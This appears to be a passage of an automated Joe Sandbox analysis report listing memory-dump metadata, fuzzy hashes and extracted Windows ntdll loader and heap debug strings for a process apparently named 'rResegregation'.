                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: 64994fa89d5821e9faf0f93a6da4351df2861e26ed1cc76a9bff4f7bd8d6638e
                                                                  • Instruction ID: a5008ad2172103dbe0b2a23589a99e8ac0de75b99de9b7b430c38b562a598446
                                                                  • Opcode Fuzzy Hash: 64994fa89d5821e9faf0f93a6da4351df2861e26ed1cc76a9bff4f7bd8d6638e
                                                                  • Instruction Fuzzy Hash: 5BF1AA74A0160ADFEB04CF68C984B6AB7F6FF48354F1085A9E415AB381DB34E981CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-2283098728
                                                                  • Opcode ID: c04e4232d1b9fdcc03d68a9f8f21f6ea2691ab56c937dc22f41b95bdac07bb42
                                                                  • Instruction ID: 13d1d64f56a6fa3f2744128ea25377e075e20b1a4e222de1f9b3babe3b8ad17d
                                                                  • Opcode Fuzzy Hash: c04e4232d1b9fdcc03d68a9f8f21f6ea2691ab56c937dc22f41b95bdac07bb42
                                                                  • Instruction Fuzzy Hash: 275101747003019BE714DF38C888B2A77A2FB89724F140A6DE4519F691EB38A841CF93
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 378280F3
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 378280E9
                                                                  • Failed to reallocate the system dirs string !, xrefs: 378280E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1783798831
                                                                  • Opcode ID: 5ac3880bbb9ccea92de451990046ed20ef84a01935e60ec9817ebc4c1a3abbd5
                                                                  • Instruction ID: 2ce2155451f21db3d350cbdf0c8c84abf512f60c063fe3897fe80272c42f7259
                                                                  • Opcode Fuzzy Hash: 5ac3880bbb9ccea92de451990046ed20ef84a01935e60ec9817ebc4c1a3abbd5
                                                                  • Instruction Fuzzy Hash: 214117B9645300ABD750DF68CC45B5B7BE8EF44764F01492AF958AB690EB3CE801CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • LdrpCheckRedirection, xrefs: 3783450F
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 37834519
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37834508
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 3446177414-3154609507
                                                                  • Opcode ID: 844693514b81e3e72019530f6e7bc7a440da12803e2eac69724d28b9dd127c13
                                                                  • Instruction ID: d6a3208bf7b11c583711b0dffd22659779777b60734715125200b008012c18e2
                                                                  • Opcode Fuzzy Hash: 844693514b81e3e72019530f6e7bc7a440da12803e2eac69724d28b9dd127c13
                                                                  • Instruction Fuzzy Hash: A5418E7A607311AFFB10CE5CD940A3677E4AF68660F0506A9EC9CDB256D725EC01CBD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 3a95063141c739c0dd52992d97653ef893679ac9b3f744d0987559a4e7560ea1
                                                                  • Instruction ID: 92e38917afa0a415110663e30c0ca13a7791ea4603ca2e210d078947fb4319a2
                                                                  • Opcode Fuzzy Hash: 3a95063141c739c0dd52992d97653ef893679ac9b3f744d0987559a4e7560ea1
                                                                  • Instruction Fuzzy Hash: 3FF10776E00615AFCB18CF68C9D06BDFFF6AF98210B59416ED466DB380D634EA41CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                  • API String ID: 0-3061284088
                                                                  • Opcode ID: 1f32a8a14277aa9dadfd561249e5b79ba87983cc8927561d11e78e4fd0f4a0b6
                                                                  • Instruction ID: ac35b9f340fa6b8b903f05c6580ad56bbb4d731e2e5e33cf72045087c6e48f00
                                                                  • Opcode Fuzzy Hash: 1f32a8a14277aa9dadfd561249e5b79ba87983cc8927561d11e78e4fd0f4a0b6
                                                                  • Instruction Fuzzy Hash: 47014C36065190FEF3858768EC4EFE27B94DB81770F14409EE4044F7A08F699844DD53
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 377B0586
                                                                  • kLsE, xrefs: 377B05FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 3446177414-2547482624
                                                                  • Opcode ID: 933e07452229fd8b5fd3b77290404773e31dbb25216a12cd7d8e612bfef8b1eb
                                                                  • Instruction ID: ae2e573cd6312de55dc4c1781af33a3f6c7ac31cb8ab8df1d986383a96569cba
                                                                  • Opcode Fuzzy Hash: 933e07452229fd8b5fd3b77290404773e31dbb25216a12cd7d8e612bfef8b1eb
                                                                  • Instruction Fuzzy Hash: 5151C0B5A0874ADFEB34DFA4C484BABB7F4AF44354F00883ED5959B640EB34A505CB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LUx7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                  • API String ID: 0-3926329107
                                                                  • Opcode ID: 461b2c76f130ae3c2f89d15d7963cb527f694ea9dda2a88c3eeca83527125039
                                                                  • Instruction ID: b1127d8877e39f8b097613f227fea15087dc962e7c036edc84074dab8cdd58bb
                                                                  • Opcode Fuzzy Hash: 461b2c76f130ae3c2f89d15d7963cb527f694ea9dda2a88c3eeca83527125039
                                                                  • Instruction Fuzzy Hash: 63B1AF75A017059FDB24CF69C894BAEB7B6AF68764F11482DE811EBBA0D730E840CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: 5de0d54e6f82754bec5e50d55adb97255094853a02a9b0f8532633e7248c2c7d
                                                                  • Instruction ID: 9edc9b2b251d359744dfbc99878b7ae8377eb1f965c0e14aa6fa3dcc72653113
                                                                  • Opcode Fuzzy Hash: 5de0d54e6f82754bec5e50d55adb97255094853a02a9b0f8532633e7248c2c7d
                                                                  • Instruction Fuzzy Hash: 82C18E74208382CFDB21DF19C084B6ABBE4FF89754F01496AF8958F250EB34DA49CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377E8341
                                                                  • LdrpInitializeProcess, xrefs: 377E8342
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 377E847E
                                                                  • @, xrefs: 377E84B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 187890c5ea3ab1b264375b463d72c772a9c2675065c5acf70feb51229070e263
                                                                  • Instruction ID: 47050a3541dd6fb28ca6febfc3c93b7b04944e8a7670ae908a78e9dfa719ae3b
                                                                  • Opcode Fuzzy Hash: 187890c5ea3ab1b264375b463d72c772a9c2675065c5acf70feb51229070e263
                                                                  • Instruction Fuzzy Hash: 9F918071509341AFE321CE60C944FAFBBECEB89794F40092DF9889A550E738D954DBA3
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 37821FE3, 378220BB
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 378220C0
                                                                  • SXS: %s() passed the empty activation context, xrefs: 37821FE8
                                                                  • .Local, xrefs: 377E27F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 6a1225c8199a20e71f4d6ae6cdaadb9ed975778b4e1fba885076d29e44b21854
                                                                  • Instruction ID: 419134686b4c4571b4677531440b782caa9087c22025466d7b187da93887d253
                                                                  • Opcode Fuzzy Hash: 6a1225c8199a20e71f4d6ae6cdaadb9ed975778b4e1fba885076d29e44b21854
                                                                  • Instruction Fuzzy Hash: 3CA1BD7590072D9FDB20CF64C888B99B3B9BF28324F1105F9D808AB651DB30AE81CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}y7
                                                                  • API String ID: 0-4000489350
                                                                  • Opcode ID: e54ef0fca90e0c9808596377409e6c60c5213ca75ae41f6a8ab465e54d846f7c
                                                                  • Instruction ID: abd64ed0081b33ca5667b3117391c944c161fa500ad2d0d952405f37f2db6d1d
                                                                  • Opcode Fuzzy Hash: e54ef0fca90e0c9808596377409e6c60c5213ca75ae41f6a8ab465e54d846f7c
                                                                  • Instruction Fuzzy Hash: 70819075608345AFE311CF14D984B6EB7E8FF98760F80092DF954AB690DBB4E900CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LUx7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                  • API String ID: 0-2749471150
                                                                  • Opcode ID: 66d25d93d2332071ad58ba49cb5bba6ad3122f3c56e8fe714c1cab86f3897a49
                                                                  • Instruction ID: d41f22b5653903e88242ee4e778acf982c65075b8b003943d4ca9d860664742f
                                                                  • Opcode Fuzzy Hash: 66d25d93d2332071ad58ba49cb5bba6ad3122f3c56e8fe714c1cab86f3897a49
                                                                  • Instruction Fuzzy Hash: 9391A975A04349CBEF21CF58C8947ADB7B1AF04764F544599EC14AF2A0D778AE80CF92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 37810E72
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 37810EB5
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 37810DEC
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 37810E2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 377B1632
                                                                  • HEAP: , xrefs: 377B14B6
                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 377B1648
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 378200C7
                                                                  • RTL: Re-Waiting, xrefs: 37820128
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 378200F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • GlobalizationUserSettings, xrefs: 3788B3B4
                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3788B3AA
                                                                  • TargetNtPath, xrefs: 3788B3AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 3780E435
                                                                  • HEAP: , xrefs: 3780E442
                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3780E455
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • LdrpCompleteMapModule, xrefs: 3781A39D
                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3781A396
                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3781A3A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 3785D792
                                                                  • HEAP: , xrefs: 3785D79F
                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3785D7B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • LdrpAllocateTls, xrefs: 3782194A
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 37821954
                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37821943
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 377BA21B
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 377BA229
                                                                  • @Sx7, xrefs: 377BA268
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
